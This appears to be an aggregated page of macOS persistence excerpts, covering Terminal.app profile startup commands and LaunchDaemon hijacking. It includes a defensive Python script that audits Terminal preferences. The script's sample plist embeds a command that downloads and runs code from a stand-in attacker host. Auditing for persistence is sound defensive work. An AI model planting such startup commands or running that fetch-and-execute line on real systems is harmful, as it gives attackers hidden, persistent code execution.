macops.ca

theevilbit.github.io
This is part 20 in the series of "Beyond the good ol' LaunchAgents", where I try to collect various persistence techniques for macOS. For more background check the introduction. This is another application specific persistence method, related to the Terminal application. In the Terminal Preferences, under the Profiles tab, we can set a command that will be executed upon Terminal's startup. This is shown in the screen below.
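A quick way to audit a machine for this technique is to look for the profile-level startup command in Terminal's preferences. The script below is an added example and is not code from the post above; it assumes that Terminal stores its profiles in `~/Library/Preferences/com.apple.Terminal.plist` under a `Window Settings` dictionary, that the startup command lives in a `CommandString` key (with `RunCommandAsShell` alongside it), and that `Startup Window Settings` / `Default Window Settings` name the profile opened at launch. The embedded plist is constructed for the demonstration.

```python
"""Flag Terminal.app profiles that carry a startup command (added example)."""
import os
import plistlib
import sys

# Assumed location of Terminal's preferences on a real system.
TERMINAL_PREFS = "~/Library/Preferences/com.apple.Terminal.plist"

# Constructed sample: one profile with a startup command, one without.
# Key names (Window Settings, CommandString, RunCommandAsShell, Startup Window
# Settings) are assumptions about Terminal's preference layout.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Default Window Settings</key>
  <string>Basic</string>
  <key>Startup Window Settings</key>
  <string>Basic</string>
  <key>Window Settings</key>
  <dict>
    <key>Basic</key>
    <dict>
      <key>name</key><string>Basic</string>
      <key>CommandString</key>
      <string>/bin/zsh -c 'curl -s http://attacker.example/p | sh'</string>
      <key>RunCommandAsShell</key><true/>
    </dict>
    <key>Pro</key>
    <dict>
      <key>name</key><string>Pro</string>
    </dict>
  </dict>
</dict>
</plist>
"""


def find_startup_commands(plist_bytes):
    """Return [(profile, command, runs_at_launch)] for every profile with a CommandString.

    runs_at_launch is True when the profile is the one Terminal opens on
    startup, i.e. the command fires every time Terminal is launched.
    """
    prefs = plistlib.loads(plist_bytes)  # handles XML and binary plists
    startup = prefs.get("Startup Window Settings") or prefs.get("Default Window Settings")
    hits = []
    for name, profile in prefs.get("Window Settings", {}).items():
        cmd = profile.get("CommandString")
        if cmd:
            hits.append((name, cmd, name == startup))
    return hits


if __name__ == "__main__":
    path = os.path.expanduser(sys.argv[1] if len(sys.argv) > 1 else TERMINAL_PREFS)
    with open(path, "rb") as f:
        data = f.read()
    for profile, cmd, at_launch in find_startup_commands(data):
        tag = "STARTUP" if at_launch else "profile"
        print(f"[{tag}] {profile}: {cmd}")
```

Run it without arguments on a live system to read the real preferences file; a hit on the startup profile is the persistence case described above, while a command on a non-default profile only fires when that profile is chosen.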
sunainapai.com

www.mac4n6.com

bradleyjkemp.dev
LaunchDaemon (or LaunchAgent) Hijacking is a macOS privilege escalation and persistence technique. It involves abusing insecure file/folder permissions to replace legitimately installed, misconfigured LaunchDaemons with malicious code. I first spotted this issue affecting the OSQuery installer but went looking and found multiple other products with the same problem. This isn't a novel technique (it's briefly mentioned in T1543.004) but I was surprised to find it so rarely talked about.

Example - Hijacking the OSQuery LaunchDaemon

I've already disclosed this issue to the OSQuery team and they kindly let me use it as an example in this post.